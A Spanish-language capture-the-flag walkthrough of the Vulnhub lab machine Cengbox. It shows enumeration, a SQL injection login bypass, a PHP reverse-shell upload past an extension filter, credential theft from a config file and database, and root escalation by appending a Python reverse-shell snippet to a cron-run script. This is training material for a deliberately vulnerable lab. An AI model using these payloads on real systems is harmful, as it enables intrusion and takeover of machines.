LaCashita!

[VLN] Cengbox

Hoy vamos a hackear la maquina de Vulnhub llamada Cengbox. Podeis descargarla desde el siguiente enlace: Cengbox

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


sml@Cassandra:~$ nmap -A -p- 192.168.1.66
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:05 CEST
Nmap scan report for 192.168.1.66
Host is up (0.00032s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 a9:cc:28:f3:8c:f5:0e:3f:5a:ed:13:f3:ad:53:13:9b (RSA)
|   256 f7:3a:a3:ff:a1:f7:e5:1b:1e:6f:58:5f:c7:02:55:9b (ECDSA)
|_  256 f0:dd:2e:1d:3d:0a:e8:c1:5f:52:7c:55:2c:dc:1e:ef (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: CEng Company
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.40 seconds

Miramos si encontramos algo interesante en el Apache.


sml@Cassandra:~$ gobuster dir -u http://192.168.1.66 -w 
/usr/share/wordlists/dirb/big.txt -x txt,php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.66
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php
[+] Timeout:        10s
===============================================================
2020/05/07 23:07:09 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/masteradmin (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)
/vendor (Status: 301)
===============================================================
2020/05/07 23:07:28 Finished
===============================================================

Vemos que hay 2 directorios que nos llaman la atencion: /masteradmin y /uploads. Al entrar en masteradmin, nos aparece Forbidden, asi que exploramos un poco mas este directorio.


sml@Cassandra:~$ gobuster dir -u http://192.168.1.135/masteradmin -w 
/usr/share/wordlist/dirb/big.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.135/masteradmin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/15 09:34:36 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/css (Status: 301)
/db.php (Status: 200)
/fonts (Status: 301)
/images (Status: 301)
/js (Status: 301)
/login.php (Status: 200)
/upload.php (Status: 200)
/vendor (Status: 301)
===============================================================
2020/05/15 09:35:06 Finished
===============================================================

Accedemos a http://192.168.1.66/masteradmin/login.php

Exploitation

Se trata de un SQL Injection.


'or 1=1;#
'or 1=1;#

Una vez dentro, vemos que podemos hacer upload. Al intentar subir nuestra webshell .php, obtenemos una respuesta de que escojamos un fichero .ceng. Asi que preparamos nuestra webshell y la renombramos terminando en .ceng:


sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php revshell.php
sml@Cassandra:~$ nano revshell.php
sml@Cassandra:~$ mv revshell.php revshell.php.ceng

Ponemos nc a la escucha.


nc -nlvp 5555

Lanzamos la webshell accediendo a: http://192.168.1.66/uploads/webshell.php.ceng

Low shell


sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.66] 45476
Linux cengbox 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16 01:16:10 UTC 2020 
x86_64 x86_64 x86_64 GNU/Linux
 00:25:30 up 21 min,  0 users,  load average: 0.08, 0.20, 0.17
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ahora que estamos dentro, exploramos el sistema.


$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@cengbox:/$ cd /var/www/html/masteradmin
www-data@cengbox:/var/www/html/masteradmin$ cat db.php
--SNIP--
$serverName = "localhost";
$username = "root";
$password = "SuperS3cR3TPassw0rd1!";
$dbName = "cengbox";
//Create Connection
$conn = new mysqli($serverName, $username, $password,$dbName);

//Check Connection
if($conn->connect_error){
        die("Connection Failed: ".$conn->connect_error);
} else { }
--SNIP--

Nos conectamos al mysql con las credenciales obtenidas.


www-data@cengbox:/$ mysql -u root -p
mysql> show databases;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| cengbox            |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)


mysql> use cengbox;

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;

+-------------------+
| Tables_in_cengbox |
+-------------------+
| admin             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from admin;

+----+-------------+---------------+
| id | username    | password      |
+----+-------------+---------------+
|  1 | masteradmin | C3ng0v3R00T1! |
+----+-------------+---------------+
1 row in set (0.00 sec)

Probamos esa password, usando como usuario cengover.

user.txt


sml@Cassandra:~$ ssh cengover@192.168.1.66
cengover@192.168.1.66's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-177-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

78 packages can be updated.
0 updates are security updates.

Last login: Wed Apr 29 18:42:51 2020 from 192.168.0.14

cengover@cengbox:~$ ls
user.txt
cengover@cengbox:~$ cat user.txt
8f7f6471e2e869f029a75c5de601d5e0

Privilege Escalation


cengover@cengbox:~/$ groups
cengover adm cdrom dip plugdev users lxd lpadmin sambashare

cengover@cengbox:~/$ find / -group users 2>/dev/null
/opt/md5check.py

Encontramos este script que por el contenido, entendemos que hay una tarea que lo ejecuta periodicamente y que el propietario es root. Lo editamos y agregamos lo siguiente para conseguir una reverse shell de root la proxima vez que se ejecute.


import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.148",8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

Ponemos nc a la escucha y esperamos :)


sml@Cassandra:/var/www/html$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.66] 37870
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

root.txt


# cd /root
# ls
note.txt  root.txt  warning.txt
# cat root.txt
 / ____|  ____|           |  _ \           
| |    | |__   _ __   __ _| |_) | _____  __
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ /
| |____| |____| | | | (_| | |_) | (_) >  < 
 \_____|______|_| |_|\__, |____/ \___/_/\_\
                      __/ |                
                     |___/                 

Congrats. Hope you enjoyed it and you can contact me on Twitter @arslanblcn_

a51e522b22a439b8e1b22d84f71cf0f2

End

Y con esto ya tendriamos el flag del "user" y el flag de "root".